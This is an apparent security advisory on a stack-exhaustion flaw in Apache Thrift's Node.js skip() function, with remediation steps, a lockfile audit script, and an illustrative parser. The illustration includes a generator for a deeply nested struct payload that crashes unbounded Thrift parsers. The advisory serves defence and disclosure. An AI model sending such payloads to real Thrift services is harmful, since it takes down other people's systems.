Apache Thrift Node.js bindings vulnerable to stack exhaustion via skip()
TL;DR - Crafted Thrift input triggers uncontrolled recursion in the Node.js skip() function, exhausting the call stack and crashing the process. Apache Thrift Node.js bindings before 0.23.0 are affected. Upgrade now.
What happened
Apache Thrift is a cross-language RPC framework - you define a service in an IDL, generate the client and server code, and ship. The Node.js bindings parse incoming Thrift messages, including calling skip() to traverse unknown fields during deserialization.
CVE-2026-41636 is an uncontrolled recursion flaw (CWE-674) in that skip() implementation. An attacker who can send Thrift messages to your service can craft input that drives skip() into unbounded recursion, blowing the stack and killing the process. CVSS v4.0 scores it 8.7 High, with availability impact rated High - which tracks: a single malformed packet, service down. The vector's AV:N/PR:N/UI:N means network reachability is the only precondition; no credentials and no user interaction are needed.
| Item | Detail |
|---|---|
| Affected component | Apache Thrift Node.js bindings |
| Affected versions | < 0.23.0 |
| Patched version | 0.23.0 |
| Severity | CVSS v4.0 8.7 (High) |
| CVSS vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L |
Recursion bugs in protocol parsers are a recurring headache: a parser that recurses once per nesting level lets the sender choose the recursion depth. When the input is attacker-controlled, availability becomes a security boundary. This is that scenario.
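To make the bug class concrete, here is an added illustration (not Apache Thrift's own code, and not the patched code) of a Thrift-binary-protocol-style skip(): a minimal bounds-checked reader whose skip() recurses once per nested STRUCT/LIST/SET/MAP level, exactly the shape that lets a sender pick the recursion depth. The same function takes a maxDepth; with Infinity it is the unbounded pattern, with a finite limit it is one form of hardening. The payloads (a benign struct with an unknown list field and a string, and a million nested structs) are constructed here; the 64-level limit is an assumed policy value, not something the advisory specifies.

```javascript
'use strict';

// Thrift binary-protocol type codes (values as defined by the Thrift spec).
const T = { STOP: 0, BOOL: 2, BYTE: 3, DOUBLE: 4, I16: 6, I32: 8, I64: 10,
            STRING: 11, STRUCT: 12, MAP: 13, SET: 14, LIST: 15 };

// Minimal bounds-checked cursor over a message buffer (illustration only).
class Reader {
  constructor(buf) { this.buf = buf; this.pos = 0; }
  need(n) { if (this.pos + n > this.buf.length) throw new Error('truncated input'); }
  readByte() { this.need(1); return this.buf[this.pos++]; }
  readI16() { this.need(2); const v = this.buf.readInt16BE(this.pos); this.pos += 2; return v; }
  readI32() { this.need(4); const v = this.buf.readInt32BE(this.pos); this.pos += 4; return v; }
  advance(n) { if (n < 0) throw new Error('negative length'); this.need(n); this.pos += n; }
}

// skip(): consume one value of `type` without decoding it. Every STRUCT, LIST,
// SET or MAP level recurses, so the sender controls the recursion depth.
// maxDepth = Infinity reproduces the unbounded pattern (CWE-674); the single
// check at the top is the hardening.
function skip(r, type, depth = 0, maxDepth = Infinity) {
  if (depth > maxDepth) throw new Error(`nesting deeper than ${maxDepth} rejected`);
  switch (type) {
    case T.BOOL: case T.BYTE: r.advance(1); return;
    case T.I16: r.advance(2); return;
    case T.I32: r.advance(4); return;
    case T.I64: case T.DOUBLE: r.advance(8); return;
    case T.STRING: r.advance(r.readI32()); return;      // i32 length prefix, then bytes
    case T.STRUCT:
      for (;;) {                                         // field header: type byte + i16 id
        const ftype = r.readByte();
        if (ftype === T.STOP) return;
        r.readI16();                                     // field id is irrelevant when skipping
        skip(r, ftype, depth + 1, maxDepth);             // recursion point
      }
    case T.LIST: case T.SET: {
      const etype = r.readByte(); const n = r.readI32();
      for (let i = 0; i < n; i++) skip(r, etype, depth + 1, maxDepth);
      return;
    }
    case T.MAP: {
      const kt = r.readByte(); const vt = r.readByte(); const n = r.readI32();
      for (let i = 0; i < n; i++) { skip(r, kt, depth + 1, maxDepth); skip(r, vt, depth + 1, maxDepth); }
      return;
    }
    default: throw new Error(`unknown type ${type}`);
  }
}

// Run skip() over a whole message (treated as a top-level struct) and classify
// the outcome. In Node.js, stack exhaustion surfaces as a RangeError
// ("Maximum call stack size exceeded"); uncaught in a server, it kills the process.
function trySkip(buf, maxDepth) {
  const r = new Reader(buf);
  try {
    skip(r, T.STRUCT, 0, maxDepth);
    return { outcome: 'ok', consumed: r.pos };
  } catch (e) {
    if (e instanceof RangeError) return { outcome: 'stack-exhausted', consumed: r.pos };
    return { outcome: 'rejected', reason: e.message, consumed: r.pos };
  }
}

// Constructed benign message: struct { 5: list<i32> [1,2,3], 2: string "hi" } STOP (30 bytes).
function benignPayload() {
  return Buffer.from([
    T.LIST, 0x00, 0x05, T.I32, 0x00, 0x00, 0x00, 0x03,
    0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x03,
    T.STRING, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x68, 0x69,
    T.STOP,
  ]);
}

// Constructed attack payload: `levels` structs nested one inside the next, each
// carrying a single STRUCT field (3 header bytes per level, then one STOP per level).
function nestedStructPayload(levels) {
  const out = Buffer.alloc(3 * levels + levels + 1);
  let p = 0;
  for (let i = 0; i < levels; i++) { out[p++] = T.STRUCT; out[p++] = 0x00; out[p++] = 0x01; }
  for (let i = 0; i <= levels; i++) out[p++] = T.STOP;
  return out;
}

const MAX_DEPTH = 64;   // assumed policy limit; size it to what your IDL can actually produce

if (typeof require !== 'undefined' && require.main === module) {
  const evil = nestedStructPayload(1000000);   // ~4 MB, a single message
  console.log('benign, bounded  :', trySkip(benignPayload(), MAX_DEPTH));
  console.log('nested, unbounded:', trySkip(evil, Infinity));
  console.log('nested, bounded  :', trySkip(evil, MAX_DEPTH));
}
```

The unbounded run never reaches the end of the 4 MB message: the RangeError fires after roughly ten thousand frames, long before the data runs out, which is why a single packet is enough. The bounded run rejects after 65 headers (195 bytes) with an ordinary Error the server can log and answer. A depth cap is the simplest fix; an explicit stack instead of recursion is the other common one.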
Who is impacted
- Any service using the Apache Thrift Node.js bindings at version < 0.23.0.
- Highest risk: internet-facing Thrift endpoints that accept untrusted input - public RPC gateways, multi-tenant services, anything reachable from a less-trusted network segment.
What to do now
- Upgrade to 0.23.0. That is the fix. The advisory's own wording: "Users are recommended to upgrade to version 0.23.0, which fixes the issue."
- Audit your dependency graph. Check monorepo lockfiles, container images, and deployed artifacts - not just your top-level package.json. Nested copies of the package (a transitive dependency pinning its own thrift) are easy to miss.
- While the upgrade rolls out, reduce exposure:
  - enforce authentication on Thrift endpoints where possible
  - apply network policy or firewall rules to limit who can reach them
  - add rate limiting to cap how many malformed requests an attacker can send; note that one crafted message is enough to crash a process, so this bounds the crash rate rather than preventing the crash
- Set up monitoring for process crashes and abnormal error rates on Thrift handlers. In Node.js, stack exhaustion surfaces as `RangeError: Maximum call stack size exceeded`, so alert on that string in crash logs. Probing activity will show up there before a full-blown outage does.
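For the dependency-audit step, here is an added script (not from the advisory or the Thrift project) that scans an npm lockfile for every installed copy of the `thrift` package, nested copies included, and reports those below 0.23.0. It handles the flat `packages` map of lockfile v2/v3 and the nested `dependencies` tree of v1. The two lockfiles embedded below are constructed samples; the package names in them other than `thrift` are made up.

```javascript
'use strict';

const FIXED_VERSION = '0.23.0';   // from the advisory
const PKG_NAME = 'thrift';         // npm package name of the Node.js bindings

// Parse "major.minor.patch" (optional leading "v"; any prerelease suffix is ignored).
function parseSemver(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v || ''));
  return m ? [Number(m[1]), Number(m[2]), Number(m[3])] : null;
}

// true when a < b by major/minor/patch. Unparseable versions return false so
// they do not masquerade as a hit; surface them separately if you see them.
function olderThan(a, b) {
  const x = parseSemver(a), y = parseSemver(b);
  if (!x || !y) return false;
  for (let i = 0; i < 3; i++) if (x[i] !== y[i]) return x[i] < y[i];
  return false;
}

// Last path segment after the final "node_modules/", so "node_modules/a/node_modules/thrift"
// yields "thrift" and a scoped name such as "@scope/thrift" is not confused with it.
function installedName(path) {
  return path.slice(path.lastIndexOf('node_modules/') + 'node_modules/'.length);
}

// Return [{ path, version }] for each copy of `name` older than `fixed`.
// v2/v3: flat `packages` map keyed by install path. v1: nested `dependencies` tree
// (walked only when `packages` is absent, since v2 carries both).
function findVulnerable(lock, name = PKG_NAME, fixed = FIXED_VERSION) {
  const hits = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (installedName(path) === name && olderThan(entry.version, fixed)) {
      hits.push({ path, version: entry.version });
    }
  }
  const walk = (deps, prefix) => {
    for (const [dep, entry] of Object.entries(deps || {})) {
      const path = `${prefix}node_modules/${dep}`;
      if (dep === name && olderThan(entry.version, fixed)) hits.push({ path, version: entry.version });
      walk(entry.dependencies, `${path}/`);
    }
  };
  if (!lock.packages) walk(lock.dependencies, '');
  return hits;
}

// Constructed lockfile v3 sample: a top-level thrift, a nested old copy under a
// transitive dependency, a nested fixed copy, and a similarly named unrelated package.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/thrift': { version: '0.21.0' },
    'node_modules/thrift-tooling': { version: '3.7.6' },
    'node_modules/legacy-rpc': { version: '2.4.0' },
    'node_modules/legacy-rpc/node_modules/thrift': { version: '0.16.0' },
    'node_modules/fresh-rpc/node_modules/thrift': { version: '0.23.0' },
  },
};

// Constructed lockfile v1 sample: the top-level copy is fixed, the nested one is not.
const SAMPLE_LOCK_V1 = {
  lockfileVersion: 1,
  dependencies: {
    'legacy-rpc': { version: '2.4.0', dependencies: { thrift: { version: '0.20.0' } } },
    thrift: { version: '0.23.0' },
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  // Usage: node audit-thrift.js path/to/package-lock.json   (falls back to the sample)
  const file = process.argv[2];
  const lock = file && file.endsWith('.json')
    ? JSON.parse(require('fs').readFileSync(file, 'utf8'))
    : SAMPLE_LOCK;
  const hits = findVulnerable(lock);
  for (const h of hits) console.log(`VULNERABLE ${h.path}@${h.version} (< ${FIXED_VERSION})`);
  console.log(hits.length ? `${hits.length} vulnerable copy(ies) found` : 'no vulnerable copies');
}
```

Run it against every lockfile in the repo and against the lockfile inside each built image, not only the one at the root. For the installed tree on a box, `npm ls thrift --all` is a quick cross-check, but the lockfile scan is what you can run in CI without a node_modules directory present.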
